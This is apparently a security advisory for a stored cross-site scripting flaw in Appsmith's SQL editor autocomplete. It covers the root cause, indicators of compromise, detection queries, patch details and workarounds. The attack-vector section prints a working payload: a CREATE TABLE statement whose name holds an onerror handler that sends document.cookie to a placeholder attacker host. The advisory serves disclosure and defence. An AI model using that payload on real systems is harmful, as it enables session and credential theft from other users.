CVE-2026-7299: Appsmith SQL Editor XSS Vulnerability

CVE-2026-7299 Overview

CVE-2026-7299 is a stored cross-site scripting (XSS) vulnerability in Appsmith's SQL query editor. The autocomplete functionality renders database object names directly into the DOM through innerHTML without sanitization. An authenticated user with Developer privileges can create database tables or columns containing malicious payloads. When other workspace members open the same datasource, the autocomplete loads the poisoned identifiers and executes attacker-controlled JavaScript in their browser sessions.

Critical Impact
A Developer-level attacker can achieve persistent JavaScript execution against any workspace member who interacts with the affected datasource, enabling session theft, credential capture, and lateral movement within the Appsmith tenant.

Affected Products

Appsmith (low-code application platform)
Workspaces using SQL datasource connections with autocomplete enabled
Pre-patch builds preceding the fix in commit 99d69180919981ed9bc5484050d809a5bec68acc

Discovery Timeline

2026-06-02 - CVE-2026-7299 published to NVD
2026-06-02 - Last updated in NVD database

Technical Details for CVE-2026-7299

Vulnerability Analysis

The flaw exists in the SQL query editor's autocomplete component. When a Developer connects a SQL datasource, Appsmith introspects the schema and lists tables and columns to assist query authoring. The frontend writes those identifier strings into the autocomplete dropdown using innerHTML rather than safe text APIs such as textContent. Because Appsmith does not escape angle brackets, quotes, or event-handler attributes, any HTML embedded in a table or column name is parsed and executed.

Exploitation requires the attacker to control table or column names in a connected database. A Developer can rename objects in databases they manage, or pivot through a previously compromised database. Once a poisoned identifier is stored, every workspace member who opens the query editor against that datasource triggers the payload. The XSS is persistent because the payload lives in the upstream database schema, not in Appsmith state.

Root Cause

The root cause is improper output encoding in a client-side rendering path [CWE-79]. Identifiers returned from datasource schema introspection are trusted and concatenated into HTML markup. There is no allowlist of identifier characters and no contextual escaping before insertion into the DOM.

Attack Vector

The attack is network-reachable but requires authenticated Developer access and victim interaction with the query editor. An attacker executes a SQL statement such as CREATE TABLE "<img src=x onerror=fetch('//attacker/?c='+document.cookie)>" (id INT) against a datasource. When another workspace user opens the SQL editor for that connection, the autocomplete renders the crafted name, the browser parses the embedded element, and the onerror handler runs in the victim's authenticated session.

The payload executes with the victim's Appsmith privileges, allowing API calls, datasource credential disclosure through the running session, and modification of applications the victim can edit. See the public proof-of-concept for end-to-end details.

Detection Methods for CVE-2026-7299

Indicators of Compromise

Database tables or columns whose names contain <, >, script, onerror, onload, or javascript: substrings
Outbound HTTP requests from Appsmith user browsers to unrecognized domains shortly after opening a SQL query editor
Audit log entries showing schema-altering statements (CREATE TABLE, ALTER TABLE, RENAME) issued by Developer accounts against shared datasources

Detection Strategies

Query connected databases for information_schema.tables and information_schema.columns and flag identifiers containing HTML metacharacters.
Inspect browser Content Security Policy (CSP) violation reports generated by the Appsmith frontend for blocked inline script executions originating from the query editor route.
Review Appsmith server access logs for repeated schema-introspection calls correlated with non-Developer user sessions.

Monitoring Recommendations

Forward Appsmith application logs and reverse-proxy logs to a centralized analytics platform and alert on anomalous datasource access patterns.
Monitor egress traffic from workstations used by Appsmith editors for connections to domains absent from an approved allowlist.
Track changes to database schemas on datasources shared across workspaces and require review for identifier names outside [A-Za-z0-9_].

How to Mitigate CVE-2026-7299

Immediate Actions Required

Upgrade Appsmith to the release that includes commit 99d69180919981ed9bc5484050d809a5bec68acc from pull request #41666.
Audit all SQL datasources for table and column names containing HTML metacharacters and rename or drop offending objects.
Rotate session tokens and datasource credentials for any workspace where a poisoned identifier was observed.

Patch Information

The vendor fix sanitizes autocomplete output before DOM insertion. Apply the upstream patch referenced in the Appsmith security advisory GHSA-vvxf-f8q9-86gh and the corresponding commit. Additional coordination details are available in the CERT/CC advisory VU#265691.

Workarounds

Restrict Developer role assignments to trusted users until the patch is applied.
Limit shared datasources so that schema-altering privileges are not granted to Appsmith service accounts.
Enforce a strict Content Security Policy on the Appsmith frontend to block inline event handlers and unauthorized script sources.

bash

# Identify suspicious identifiers in a connected PostgreSQL datasource
psql -h db.internal -U appsmith_ro -d app -c \
  "SELECT table_schema, table_name FROM information_schema.tables \
   WHERE table_name ~ '[<>\"'']|script|onerror|onload';"

psql -h db.internal -U appsmith_ro -d app -c \
  "SELECT table_schema, table_name, column_name FROM information_schema.columns \
   WHERE column_name ~ '[<>\"'']|script|onerror|onload';"